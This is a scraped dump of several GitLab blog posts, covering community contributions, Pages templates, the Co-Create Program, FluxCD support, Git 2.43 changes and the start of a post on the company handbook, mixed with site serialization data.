[Steve Exley](https://gitlab.com/steve.exley) worked for more than 5 months contributing one of\n   [the biggest architectural changes to the Docker executor](/releases/2020/03/22/gitlab-12-9-released/#gitlab-runner-129).\n   that solved multiple issues for the Docker executor, including [jobs sharing the same network bridge](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/4430),\n   [services don't work when `network_mode` is specified](https://gitlab.com/gitlab-org/gitlab-runner/-/issues/2699),\n   and lastly, services can connect to one another and connect with the build container as well!\n   The [merge request](https://gitlab.com/gitlab-org/gitlab-runner/-/merge_requests/1569) involved 69 people, who posted 293 discussion notes. It landed in GitLab 12.9, and received five 🔥 emoji votes.\n1. [Jesse Hall](https://gitlab.com/jessehall3) worked for more than 5 months contributing one of\n   [the Batch Suggestions feature](/releases/2020/07/22/gitlab-13-2-released/#batch-suggestions) which allows MR reviewers to group all suggestions made to a diff and submit them at once.\n   Because each suggestion translates into a Git operation, submitting these individually could take a long time if there were a large number of suggestions. Submitting suggestions in batches has numerous advantages, including time savings, efficient CI resource utilization (only one pipeline for all suggestions), and preventing an overly noisy Git history.\n   The [merge request](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/22439) involved 38 people, who posted 358 discussion notes. It landed in GitLab 13.2, and received seven 💚 emoji votes.\n\n## Get some help from the GitLab team\n\nIf you need any help while contributing to GitLab, below are some of the resources that are available.\n\n1. Ask questions on the [Contributors Gitter Channel](https://gitter.im/gitlabhq/contributors).\n1. 
Get in touch with [Merge Request Coaches](https://handbook.gitlab.com/job-families/expert/merge-request-coach/). To find a merge request coach, go to the GitLab Team Page and search for \"Merge Request Coach\".\n   You can also mention Merge Request Coaches by typing `@gitlab-org/coaches` in a comment.\n1. Find reviewers & maintainers of Gitlab projects in our [handbook](/handbook/engineering/projects/#gitlab) and [mention](https://docs.gitlab.com/ee/user/group/subgroups/#mentioning-subgroups) them in a comment.\n1. If you have feature ideas/questions, you can search for existing issues or create a new issue if there isn't one already. Feel free to [mention](https://docs.gitlab.com/ee/user/group/subgroups/#mentioning-subgroups) [product team members](/handbook/product/categories/) in the issue.\n\nWait for a reviewer. You’ll likely need to change some things once the reviewer has completed a code review for your merge request.\nYou may also need multiple reviews depending on the size of the change.\nIf you don't hear from anyone in a timely manner, feel free to find reviewers or reach out to Merge Request Coaches.\nPlease don't be shy about [mentioning](https://docs.gitlab.com/ee/user/project/issues/index.html)\nGitLab team members in your merge requests as all team members are expected to be responsive to fellow community members.\n\n## How we stay on top of community contributions\n\nIn Q3 of 2020, several GitLab teams are focusing on improving the experience for community contributors. 
To achieve this goal,\nwe created a few metrics around community contributions:\n\n* [Community Contribution Mean Time to Merge](/handbook/engineering/quality/performance-indicators/#community-contribution-mean-time-to-merge)\n* [Unique Community Contributors per Month](/handbook/engineering/quality/performance-indicators/#unique-community-contributors-per-month)\n* [Community MR Coaches per Month](/handbook/engineering/quality/performance-indicators/#community-mr-coaches-per-month)\n\nTo make sure the GitLab team is working hand in hand with the wider community in a timely fashion, we've already put a few automations in place:\n\n1. Every hour, wider community contributions are automatically [labelled \"Community contribution\"](/handbook/engineering/quality/triage-operations/#community-contributions).\n1. Every day, a report with the [untriaged](/handbook/engineering/quality/merge-request-triage/) community merge requests is created and assigned to the Merge Request Coaches for triage. This ensures each merge request has a [stage and group](/handbook/product/categories/#hierarchy) labels set.\n1. Every two weeks, a report with unassigned and idle community contributions is created for each [group](/handbook/product/categories/#hierarchy).\n\nThese automations are powered by our [`triage-ops` project](https://gitlab.com/gitlab-org/quality/triage-ops/) and are documented in [Triage Operations](/handbook/engineering/quality/triage-operations/).\n\nI hope this post convinced you to start contributing to GitLab. 
Keep in mind, any contribution is valuable, and don't worry, we're here to support you.\n\nCover image: [\"Żuki leśne na liściu jesienią\"](https://unsplash.com/photos/5S2xIoNpcGk) by [Krzysztof Niewolny](https://unsplash.com/@epan5).\n{: .note}\n",[779,267,708,803,9],{"slug":4771,"featured":6,"template":689},"start-contributing-to-gitlab-today","content:en-us:blog:start-contributing-to-gitlab-today.yml","Start Contributing To Gitlab Today","en-us/blog/start-contributing-to-gitlab-today.yml","en-us/blog/start-contributing-to-gitlab-today",{"_path":4777,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4778,"content":4784,"config":4789,"_id":4791,"_type":14,"title":4792,"_source":16,"_file":4793,"_stem":4794,"_extension":19},"/en-us/blog/start-using-pages-quickly",{"title":4779,"description":4780,"ogTitle":4779,"ogDescription":4780,"noIndex":6,"ogImage":4781,"ogUrl":4782,"ogSiteName":673,"ogType":674,"canonicalUrls":4782,"schema":4783},"New: How to get up and running quickly using GitLab Pages templates","We're introducing bundled GitLab Pages templates, so let's take a look at how easy it really is now to get up and running with a new site.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679908/Blog/Hero%20Images/pages-templates-cover-image.jpg","https://about.gitlab.com/blog/start-using-pages-quickly","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"New: How to get up and running quickly using GitLab Pages templates\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jason Yavorska\"}],\n        \"datePublished\": \"2019-02-20\",\n      }",{"title":4779,"description":4780,"authors":4785,"heroImage":4781,"date":4786,"body":4787,"category":801,"tags":4788},[2288],"2019-02-20","\n\nHello everyone, my name is Jason Yavorska and I'm the product manager for the [Release stage](/stages-devops-lifecycle/release/) here at GitLab, which includes GitLab Pages. 
In our [GitLab 11.8 release (March 2019) we're introducing](https://gitlab.com/gitlab-org/gitlab-ce/issues/47857) a quick way to select from our most popular [Pages templates](https://gitlab.com/pages?sort=stars_desc) directly from the new project setup screen. If you use GitLab.com, you can take advantage of this feature already! It looks a bit like this:\n\n![Pages Templates View](https://about.gitlab.com/images/blogimages/pages-templates-view.png){: .shadow.medium.center}\n\nNow, instead of having to fork an existing template, you can simply select one of the bundled ones and get going right away. If you're interested in one of the other templates, you can still create those in the old way – check out the [existing documentation on how to fork a template](https://docs.gitlab.com/ee/user/project/pages/index.html#fork-a-project-to-get-started-from).\n\nIn this article I'm going to show you just how effortless all of this can be. But first:\n\n## My experience contributing GitLab Pages templates\n\nFirst, though, I'd be remiss if I didn't mention that I contributed this change myself (with the help of a few key supporting players, of course.) Now, you may be wondering: I thought you were a product manager at GitLab? Not a developer? Well, that's absolutely true, but I am a hobbyist programmer on the side. I've contributed a small change here or there on my own time, but this was the largest, most complex thing that I've ever contributed myself.\n\nI always find in these situations that contributing is in some ways easier than you expect, and in some ways more challenging. Getting the code working was actually surprisingly straightforward: I was able to get our GDK ([GitLab Development Kit](https://gitlab.com/gitlab-org/gitlab-development-kit/blob/master/README.md)) up and running with minimal hassle, and then was able to iterate quickly until I found a working solution. 
Most of my challenges ended up being around getting the change through our review process and into the release. There's a lot you have to learn there, and I think it just takes some time and practice in order to have it all click. What was truly amazing, though, was all the friendly people who jumped in to help me along the way. I learned so much and am so proud of how everything came together in the end.\n\nIf you're considering making your first contribution, feel free to reach out to me on Twitter ([@j4yav](https://twitter.com/j4yav)) and I'll be happy to help guide you in the right direction. Contributing to open source is a great feeling, big or small, and if you haven't tried it before you should really give it a go.\n\n## Now let's set up a site!\n\nWith that out of the way, let's see this in action to appreciate just how painless it really is to set up a new site in GitLab pages now.\n\nThe video below walks through the steps, with full instructions underneath.\n\n Note that if you're using a private on-premise version of GitLab, be sure to check with your administrator to ensure that Pages is enabled. You may need to adjust some of the URLs in the setup below depending on your site configuration.\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://youtube.com/embed/C2E1M-4Jvd0\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n### 1. Create the new project\n\nFor this example, we'll use the [Hugo](https://gohugo.io/) template, our most popular one. Simply go to the GitLab home page, and select \"New Project\" from the top right. Click on \"Create from template,\" click on the Hugo template, and then click on \"Use template.\" Give it a name like `namespace.gitlab.io`, where `namespace` is your `username` or `groupname`.\n\n### 2. 
Run your first pipeline\n\nWe need to make one quick edit, which will naturally kick off a pipeline and deploy our site for the first time. What we need to do is edit our `config.toml` to have the same URL that we set up in the project name. To do this we will go to Repository → Files, click on the `config.toml` file, and then click on \"Edit\" in the toolbar. All we need to do is change the `baseurl = \"https://pages.gitlab.io/hugo/\"` line to `baseurl = \"https://namespace.gitlab.io/\"` (again, replacing `namespace` with your `username` or `groupname`).\n\nCommit your changes, then head over to CI/CD → Pipelines and look for the new pipeline that's running. You can click on the status to see the build log, or just wait for it to finish – you might be surprised at how fast this is! Once the pipeline passes, we're good to go. It may take a minute or two for everything to work through replication, but once it does, you can see your new site at `https://namespace.gitlab.io/`, beautiful template included, just waiting for you to customize further.\n\n### 3. Where to go next\n\nThere's a lot of basic configuration for your site in the `config.toml`, check that out and see what you might like to modify. The about page is in `/content/page/about.md`, and you can see example posts for your blog in `/content/post` – feel free to delete these when you're done with them. Since these are written in [markdown](https://docs.gitlab.com/ee/user/markdown.html) they are a piece of cake to edit or add new ones. Getting started with Hugo is a bit out of scope for this post, but I assure you it's quite straightforward. You can check out the [Hugo getting started pages](https://gohugo.io/getting-started/) for more ideas on what you can do. Be sure also to check out [Hugo themes](https://gohugo.io/themes/) if you're looking for inspiration.\n\nHopefully this was helpful in getting you started. 
Good luck with your new site!\n\nCover image by [José Alejandro Cuffia](https://unsplash.com/@alecuffia) on [Unsplash](https://unsplash.com/)\n{: .note}\n",[1037,1099,803,9],{"slug":4790,"featured":6,"template":689},"start-using-pages-quickly","content:en-us:blog:start-using-pages-quickly.yml","Start Using Pages Quickly","en-us/blog/start-using-pages-quickly.yml","en-us/blog/start-using-pages-quickly",{"_path":4796,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4797,"content":4803,"config":4809,"_id":4811,"_type":14,"title":4812,"_source":16,"_file":4813,"_stem":4814,"_extension":19},"/en-us/blog/the-co-create-program-how-customers-are-collaborating-to-build-gitlab",{"title":4798,"description":4799,"ogTitle":4798,"ogDescription":4799,"noIndex":6,"ogImage":4800,"ogUrl":4801,"ogSiteName":673,"ogType":674,"canonicalUrls":4801,"schema":4802},"The Co-Create Program: How customers are collaborating to build GitLab","Learn how organizations like Thales, Scania, and Kitware are partnering with GitLab engineers to contribute meaningful features that benefit the entire community.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659756/Blog/Hero%20Images/REFERENCE_-_display_preview_for_blog_images.png","https://about.gitlab.com/blog/the-co-create-program-how-customers-are-collaborating-to-build-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The Co-Create Program: How customers are collaborating to build GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Fatima Sarah Khalid\"}],\n        \"datePublished\": \"2025-01-30\",\n      }",{"title":4798,"description":4799,"authors":4804,"heroImage":4800,"date":4805,"body":4806,"category":4807,"tags":4808},[1372],"2025-01-30","This past year, over 800 community members have made more than 3,000 contributions to GitLab. 
These contributors include team members from global organizations like Thales, Scania, and Kitware, who are helping shape GitLab's future through the [Co-Create Program](https://about.gitlab.com/community/co-create/) — GitLab's collaborative development program where customers work directly with GitLab engineers to contribute meaningful features to the platform.\n\nThrough workshops, pair programming sessions, and ongoing support, program participants get hands-on experience with GitLab's architecture and codebase while solving issues or improving existing features.\n\n\"Our experience with the Co-Create Program has been incredible,\" explains Sébastien Lejeune, open source advocate at Thales. \"It only took two months between discussing our contribution with a GitLab Contributor Success Engineer and getting it live in the GitLab release.\"\n\nIn this post, we'll explore how customers have leveraged the Co-Create Program to turn their ideas into code, learning and contributing along the way.\n\n## The Co-Create experience\n[The GitLab Development Kit (GDK)](https://gitlab.com/gitlab-org/gitlab-development-kit) helps contributors get started developing on GitLab. \"The advice I would give new contributors is to remember that you can't break anything with the GDK,\" says Hook. \"If you make a change and it doesn't work, you can undo it or start again. 
The beauty of GDK is that you can tinker, test, and learn without worrying about the environment.\"\n\nEach participating organization in the Co-Create Program receives support throughout their contribution journey:\n\n- __Technical onboarding workshop__: A dedicated session to set up the GitLab Development Kit (GDK) and understand GitLab's architecture\n- __1:1 engineering support__: Access to GitLab engineers for pair programming and technical guidance\n- __Architecture deep dives__: Focused sessions on specific GitLab components relevant to the issue the organization is contributing to\n- __Code review support__: Detailed feedback and guidance through the merge request process\n- __Regular check-ins__: Ongoing collaboration to ensure progress and address any challenges\n\nThis structure ensures that teams can contribute effectively, regardless of their prior experience with GitLab's codebase or the Ruby/Go programming language. As John Parent from Kitware notes, \"If you've never seen or worked with GitLab before, you're staring at a sophisticated architecture and so much code across different projects. The Co-Create Program helps distill what would take weeks of internal training into a targeted crash course.\"\n\nThe result is a program that not only helps deliver new features but also builds lasting relationships between GitLab and its user community. \"It's inspiring for our engineers to see the passion our customers bring to contributing to and building GitLab together,\" shares Shekhar Patnaik, principal engineer at GitLab. \"Customers get to see the 'GitLab way,' and engineers get to witness their commitment to shaping the future of GitLab.\"\n\n## Enhancing project UX with Thales\nWhen Thales identified opportunities to improve GitLab's empty project UI, they didn't just file a feature request — they built the solution themselves. 
Their contributions focused on streamlining the new project setup experience by simplifying SSH/HTTPS configuration with a tabbed interface and adding copy/paste functionality for the code snippets. These changes had a significant impact on developer workflows.\n\nThe team's impact extended beyond the UX improvements. Quentin Michaud, PhD fellow for cloud applications on the edge at Thales, contributed to improving the GitLab Development Kit (GDK). As a package maintainer for Arch Linux, Michaud's expertise helped improve GDK's documentation and support its containerization efforts, making it easier for future contributors to get started.\n\n\"My open source experience helped me troubleshoot GDK's support for Linux distros,” says Michaud. “While improving package versioning documentation, I saw that GitLab's Contributor Success team was also working to set up GDK into a container. Seeing our efforts converge was a great moment for me — it showed how open source collaboration can help build better solutions.\"\n\nThe positive experience for the Thales team means that Lejeune now uses the Co-Create Program as \"a powerful example to show our managers the return on investment from open source contributions.\"\n\n## Advancing package support with Scania\nWhen Scania needed advanced package support in GitLab, they saw an opportunity to contribute and build it themselves. \n\n\"As long-time GitLab users who actively promote open source within our organization, the Co-Create Program gave us a meaningful way to contribute directly to open source,\" shares Puttaraju Venugopal Hassan, solution architect at Scania.\n\nThe team started with smaller changes to familiarize themselves with the codebase and review process, then progressed to larger features. \"One of the most rewarding aspects of the Co-Create Program has been looking back at the full, end-to-end process and seeing how far we've come,\" reflects Océane Legrand, software developer at Scania. 
\"We started with discovery and smaller changes, but we took on larger tasks over time. It's great to see that progression.\" \n\nTheir contributions include bug fixes for the package registry and efforts to enhance the Conan package registry feature set, bringing it closer to general availability (GA) readiness while implementing Conan version 2 support. Their work and collaboration with GitLab demonstrates how the Co-Create Program can drive significant improvements to GitLab’s package registry capabilities.\n\n\"From the start, our experience with the Co-Create Program was very organized. We had training sessions that guided us through everything we needed to contribute. One-on-one sessions with a GitLab engineer also gave us an in-depth look at GitLab’s package architecture, which made the contribution process much smoother,\" said Juan Pablo Gonzalez, software developer at Scania. \n\nThe impact of the program goes beyond code — program participants are also building valuable skills as a direct result of their contributions. In [the GitLab 17.8 release](https://about.gitlab.com/releases/2025/01/16/gitlab-17-8-released/#mvp), both Legrand and Gonzalez were recognized as GitLab MVPs. Legrand talked about how the work she's doing in open source impacts both GitLab and Scania, including building new skills for her and her team: \"Contributing through the Co-Create Program has given me new skills, like experience with Ruby and background migrations. When my team at Scania faced an issue during an upgrade, I was able to help troubleshoot because I'd already encountered it through the Co-Create Program.\"\n\n## Optimizing authentication for high-performance computing with Kitware\nKitware brought specialized expertise from their work with national laboratories to improve GitLab's authentication framework. 
Their contributions included adding support for the OAuth2 device authorization grant flow in GitLab, as well as implementing new database tables, controllers, views, and documentation. This contribution enhances GitLab's authentication options, making it more versatile for devices without browsers or with limited input capabilities.\n\n\"The Co-Create Program is the most efficient and effective way to contribute to GitLab as an external contributor,\" shares John Parent, R&D engineer at Kitware. \"Through developer pairing sessions, we found better implementations that we might have missed working alone.\"\n\nAs a long-time open source contributor, Kitware particularly appreciated GitLab's approach to development. \"I assumed GitLab wouldn't rely on out-of-the-box solutions at its scale, but seeing them incorporate a Ruby dependency instead of building a custom in-house solution was great,” says Parent. “Coming from the C++ world, where package managers are rare, it was refreshing to see this approach and how straightforward it could be.\"\n\n## Building better together: Benefits of Co-Create\nThe Co-Create Program creates value that flows both ways. \"The program bridges a gap between us as GitLab engineers and our customers,\" explains Imre Farkas, staff backend engineer at GitLab. \"As we work with them, we hear their day-to-day challenges, the parts of GitLab they rely on, and where improvements can be made. It's great to see how enthusiastic they are about getting involved in building GitLab with us.\"\n\nThis collaborative approach also accelerates GitLab's development. As Shekhar Patnaik, principal engineer at GitLab, observes: \"Through Co-Create, our customers are helping us move our roadmap forward. Their contributions allow us to deliver critical features faster, benefitting our entire user base. 
As the program scales, there's a real potential to accelerate development on our most impactful features by working alongside the very people who rely on them.\"\n\n## Get started with Co-Create\nReady to turn your feature requests into reality? Whether you're looking to enhance GitLab's UI like Thales, improve package support like Scania, or optimize authentication like Kitware, the Co-Create Program welcomes organizations who want to actively shape GitLab's future while building valuable open source experience.\n\nContact your GitLab representative to learn more about participating in the Co-Create Program, or visit our [Co-Create page](https://about.gitlab.com/community/co-create/) for more information.\n","customer-stories",[708,9,974],{"slug":4810,"featured":91,"template":689},"the-co-create-program-how-customers-are-collaborating-to-build-gitlab","content:en-us:blog:the-co-create-program-how-customers-are-collaborating-to-build-gitlab.yml","The Co Create Program How Customers Are Collaborating To Build Gitlab","en-us/blog/the-co-create-program-how-customers-are-collaborating-to-build-gitlab.yml","en-us/blog/the-co-create-program-how-customers-are-collaborating-to-build-gitlab",{"_path":4816,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4817,"content":4822,"config":4827,"_id":4829,"_type":14,"title":4830,"_source":16,"_file":4831,"_stem":4832,"_extension":19},"/en-us/blog/the-continued-support-of-fluxcd-at-gitlab",{"title":4818,"description":4819,"ogTitle":4818,"ogDescription":4819,"noIndex":6,"ogImage":1090,"ogUrl":4820,"ogSiteName":673,"ogType":674,"canonicalUrls":4820,"schema":4821},"The continued support of FluxCD at GitLab","GitLab is committed to working with other partners to make sure that Flux remains a stable, reliable, and mature Cloud Native Computing Foundation project.\n","https://about.gitlab.com/blog/the-continued-support-of-fluxcd-at-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": 
\"Article\",\n        \"headline\": \"The continued support of FluxCD at GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Viktor Nagy\"}],\n        \"datePublished\": \"2024-03-05\",\n      }",{"title":4818,"description":4819,"authors":4823,"heroImage":1090,"date":4824,"body":4825,"category":930,"tags":4826},[1012],"2024-03-05","Last month, Weaveworks CEO Alexis Richardson [announced publicly](https://www.linkedin.com/posts/richardsonalexis_hi-everyone-i-am-very-sad-to-announce-activity-7160295096825860096-ZS67) the company, which is the main sponsor of FluxCD, is closing its doors and shutting down its commercial operations.\n\nGitLab made a strategic decision in early 2023 [to integrate FluxCD with its agent for Kubernetes offering](https://about.gitlab.com/blog/why-did-we-choose-to-integrate-fluxcd-with-gitlab/) as the recommended GitOps solution. While we were sad to see the news about Weaveworks, the company, it in no way changes our commitment to FluxCD, the project, and its ability to drive efficiencies for our customers. FluxCD is a mature, enterprise-ready GitOps solution with a modern, modular architecture and clean codebase that lends itself for integration and requires minimal maintenance.\n\nIn the past month, we have had discussions with a number of companies that built their tooling around FluxCD, and together we are certain that FluxCD is a solution we want to continue to support and rely upon. We looked into switching to alternatives, but decided against other options. We are confident in the future of Flux. Flux is a mature Cloud Native Computing Foundation (CNCF) project with a large and dedicated user base. We believe that our continued support and integration with Flux serves our users the best.\n\nUnfortunately, such an organizational change affects the status of the Flux maintainers. At GitLab, we are committed to open source. 
When we decided to integrate with Flux, we knew that, sooner or later, we would like to have FluxCD maintainers within GitLab. Given the recent changes, we are committed even more to playing an active role in the Flux community and we want to support FluxCD for enterprise customers.\n\n> “GitLab is a proven platform for software delivery, and I am really pleased to see their leadership standing up to help and support Flux. As the inventors of GitOps and FluxCD, I know that Weaveworks people and all our customers will want to see this. For my part, I’m more confident in the future of Flux than ever, and I’m happy to see GitLab being one of the companies working on enterprise Flux support.” - Alexis Richardson, CEO, Weaveworks\n\nAs these are turbulent times in the Flux community, we are working closely with other partners to make sure that Flux remains a stable, reliable, and mature CNCF project.\n\n> Read more about [our FluxCD integration](https://about.gitlab.com/blog/why-did-we-choose-to-integrate-fluxcd-with-gitlab/).\n",[845,930,9,803],{"slug":4828,"featured":91,"template":689},"the-continued-support-of-fluxcd-at-gitlab","content:en-us:blog:the-continued-support-of-fluxcd-at-gitlab.yml","The Continued Support Of Fluxcd At Gitlab","en-us/blog/the-continued-support-of-fluxcd-at-gitlab.yml","en-us/blog/the-continued-support-of-fluxcd-at-gitlab",{"_path":4834,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4835,"content":4841,"config":4846,"_id":4848,"_type":14,"title":4849,"_source":16,"_file":4850,"_stem":4851,"_extension":19},"/en-us/blog/the-contributions-we-made-to-the-git-2-43-release",{"title":4836,"description":4837,"ogTitle":4836,"ogDescription":4837,"noIndex":6,"ogImage":4838,"ogUrl":4839,"ogSiteName":673,"ogType":674,"canonicalUrls":4839,"schema":4840},"The contributions we made to the Git 2.43 release","Git 2.43 included some improvements from GitLab's Git team. 
Here are some highlights from the work the team has done on Git and why it matters.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659507/Blog/Hero%20Images/AdobeStock_623844718.jpg","https://about.gitlab.com/blog/the-contributions-we-made-to-the-git-2-43-release","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The contributions we made to the Git 2.43 release\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"John Cai\"}],\n        \"datePublished\": \"2024-01-11\",\n      }",{"title":4836,"description":4837,"authors":4842,"heroImage":4838,"date":4843,"body":4844,"category":10,"tags":4845},[1512],"2024-01-11","[Git 2.43](https://gitlab.com/gitlab-org/git/-/raw/master/Documentation/RelNotes/2.43.0.txt)\nwas officially released on November 20, 2023, and included some improvements from GitLab's Git team. Here are some highlights from the work our team has\ndone on Git and why it matters.\n\n## Segmenting objects across packfiles\n\nIn Git 2.43, [Christian Couder](https://about.gitlab.com/company/team/#chriscool)\nadded a `--filter` option to the `git repack` command. Supported filter (see the\n[filter-spec docs](https://git-scm.com/docs/git-rev-list#Documentation/git-rev-list.txt---filterltfilter-specgt)) can be added to the `git repack --filter` flag. This will cause the filtered out objects to be\npacked into a separate packfile.\n\nA `--filter-to` option was also added. Providing this option will cause Git to write the filtered packfile to the specified location on the filesystem.\n\n### Why it matters\n\nGitaly servers host Git repositories and incur storage costs. In many repositories however, not all the objects need to be accessed all the time. 
Allowing Git to\noffload some repository data onto a different packfile paves the way for storage optimizations whereby we can choose to segment the Git repository data and place\ncertain kinds of objects on cheaper storage such as slower disks or object storage.\n\n## Checking object existence\n\nIn Git, to check the existence of an object one would have to rely on Git returning an error if it couldn’t find an object. However, to date, there has not been a generic way in Git to check the existence of an object. There were certain edge cases that were not handled well by the underlying Git code. For example, if a reference exists as a symbolic reference, but its target branch does not exist.\n\n[Patrick Steinhardt](https://about.gitlab.com/company/team/#pks-gitlab) added the `--exists` option to `git show` as a generic way to check for object existence.\n\n### Why it matters\n\nThe Gitaly team has started work to upstream the [reftable backend](https://gitlab.com/groups/gitlab-org/-/epics/11652) into the Git project. This new flag enables consistent validation of object existence to fix a number of tests to work with the reftables backend.\n\n## Find missing commit objects \n\n`git rev-list`'s `--missing` option provides information about objects that are referenced but are missing from a repository. Up to this release however, this option only worked with blobs and trees. Missing commits would cause `git rev-list` to fail with a fatal error.\n\nIn Git 2.43, [Karthik Nayak](https://about.gitlab.com/company/team/#knayakgl)\nextended the `--missing` option to work with commit objects.\n\n### Why it matters\n\nGitaly's next-generation repository replication implementation relies on a [write\nahead log](https://gitlab.com/groups/gitlab-org/-/epics/8911) (WAL) that logs every write to a repository.\n\nThe upcoming WAL creates separate log entries per transaction – as such, some transactions contain reference updates. 
In these transactions, it is necessary to identify new git objects being added to the repository. The WAL implementation uses a quarantine directory to stage these new objects. \n\nWe can now use git-rev-list(1) along with the --missing flag, to identify all the objects that are newly added and required and also boundary commits that connect the quarantine directory to the main object directory.\n\n## Read gitattributes from HEAD in bare repos\n\nStarting in 2.43, [John Cai](https://about.gitlab.com/company/team/#jcaigitlab)\nmade a change that allows [Git attributes](https://git-scm.com/docs/gitattributes) to start to read attributes from the tree that HEAD points to by default, in bare repositories.\n\n### Why it matters\n\nTo reduce some tech debt around how git attributes are read in a repository, we added the ability to pass a tree object directly to Git through the [`--attr-source` flag](https://git-scm.com/docs/git#Documentation/git.txt---attr-sourcelttree-ishgt).\n\nPassing in `HEAD` to `--attr-source` would fail however, when `HEAD` pointed to an unborn branch, so Gitaly would have needed to use a separate call to check if `HEAD` were unborn before passing it in.\n\nThis change not only causes Git to read attributes from `HEAD` by default, which means we don't need to pass in anything, but also silently ignores it if `HEAD` is unborn, which is the behavior we want in Gitaly. This way, we don't need to make any code changes in Gitaly for this to work.\n\nThis leads to simplification on the Gitaly side, as we seek to remove some [technical debt around gitattributes](https://gitlab.com/groups/gitlab-org/-/epics/9006)\nput in during a time when Git lacked support around reading gitattributes in bare repositories.\n\n## Bug fixes\n\n[Patrick Steinhardt](https://about.gitlab.com/company/team/#pks-gitlab) fixed a bug in `git rev-list --stdin`.  
\n\nSteinhardt also addressed an existing issue in [commit-graphs](https://git-scm.com/docs/commit-graph) whereby commits parsed from the commit-graph weren’t always checked for existence. A `GIT_COMMIT_GRAPH_PARANOIA` environment variable can now be turned on to always check for object existence.",[267,9,751],{"slug":4847,"featured":6,"template":689},"the-contributions-we-made-to-the-git-2-43-release","content:en-us:blog:the-contributions-we-made-to-the-git-2-43-release.yml","The Contributions We Made To The Git 2 43 Release","en-us/blog/the-contributions-we-made-to-the-git-2-43-release.yml","en-us/blog/the-contributions-we-made-to-the-git-2-43-release",{"_path":4853,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4854,"content":4860,"config":4867,"_id":4869,"_type":14,"title":4870,"_source":16,"_file":4871,"_stem":4872,"_extension":19},"/en-us/blog/the-gitlab-handbook-by-numbers",{"title":4855,"description":4856,"ogTitle":4855,"ogDescription":4856,"noIndex":6,"ogImage":4857,"ogUrl":4858,"ogSiteName":673,"ogType":674,"canonicalUrls":4858,"schema":4859},"The GitLab handbook by numbers","Two GitLab team-members take a fresh look at GitLab's open source team handbook, charting its evolution over the years to the weighty tome it is today.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670434/Blog/Hero%20Images/handbook-cover.jpg","https://about.gitlab.com/blog/the-gitlab-handbook-by-numbers","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The GitLab handbook by numbers\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Lukas Eipert\"},{\"@type\":\"Person\",\"name\":\"Lee Matos\"}],\n        \"datePublished\": \"2019-04-24\",\n      }",{"title":4855,"description":4856,"authors":4861,"heroImage":4857,"date":4864,"body":4865,"category":299,"tags":4866},[4862,4863],"Lukas Eipert","Lee Matos","2019-04-24","\nSharing and retrieving information is a crucial part 
of everyday work life.\nWhere do you get information from, be it about hiring processes, social media guidelines, or reporting expenses?\nAt GitLab, all of that can be found in [the handbook](https://handbook.gitlab.com/) – have a look, it's public!\n[Sid](/company/team/#sytses), our CEO, [wrote about the importance and the open sourcing of our handbook][sid-blog-post] about two and a half years ago.\nBack then we were just shy of 100 employees.\nIn this post we will look at how the handbook has developed over time, how we interact with it,\nand how it still works for over 550 employees.\n\n[sid-blog-post]: /blog/our-handbook-is-open-source-heres-why/\n\n## One book to guide them all\n\nAt the time of writing, the handbook contains about 605,000 words.\nWhile probably a bit less captivating than the tales of Frodo and Middle Earth,\nwe have composed more pages than \"The Lord of the Rings\" and \"The Hobbit\" combined, since the [first commit][first-commit] in 2015.\nIt would take around 50 hours of continuous reading to cover the whole handbook, front to back.\n\n### Is it overwhelming to read through it all?\n\nIt would be, but as the handbook covers a wide range of topics, you probably don't need to read every single word.\nAs the handbook changes over time it is not necessary to memorize it all, but it is more important to remember how to retrieve information.\nSo as long as you know where to find something, you are on the safe side.\n\n> It would take around 50 hours of continuous reading to cover the whole handbook, front to back\n\n[first-commit]: https://gitlab.com/gitlab-com/www-gitlab-com/blob/2d2ced8f79da96fe981a3a6f6cf5918fa2dd992a/source/team-handbook/index.html\n\n## One book to be written by them all\n\n![Graph showing the growth of the handbook over time (May 2015 - April 2019)](https://about.gitlab.com/images/blogimages/evolution_handbook/handbook-history.png){: .shadow.center}\n*\u003Csmall>Graph showing the growth of the handbook, broken down by 
subcategory, over time (May 2015 – April 2019)\u003C/small>*\n\nCurrently all knowledge in the handbook is spread across 550 unique web pages, with the average page containing around 1,100 words.\nThe most words have been written in the subcategory engineering (138,000 words), with marketing a close second (115,000 words).\nTypically, as teams grow, more of their processes get documented in the handbook, which leads to a natural growth of the respective category.\n\n> The most words have been written in the subcategory engineering (138,000 words)\n\n### Who contributes to the handbook?\n\nYou might think that there is someone special who writes all those pages, but it's important\nto remember that [everyone can contribute](https://handbook.gitlab.com/handbook/company/mission/) to the handbook. It is actually part of our [onboarding process]\nto improve something about the handbook – whether that's clarifying wording or making it easier to find something.\nNothing is exempt from change; even [our core values are adjusted over the course of time][values-history].\n\n### How do you make changes to the handbook?\n\nIf someone at GitLab or from the wider community wants to change something, they follow a simple workflow that is familiar to every GitLab user:\n\n1. Create a merge request which introduces the change.\n2. Discuss the merge request with the stakeholders.\n3. Iterate on the change and come to an agreement.\n4. Let the merge request be merged.\n\nMore important changes (not every typo of course!) 
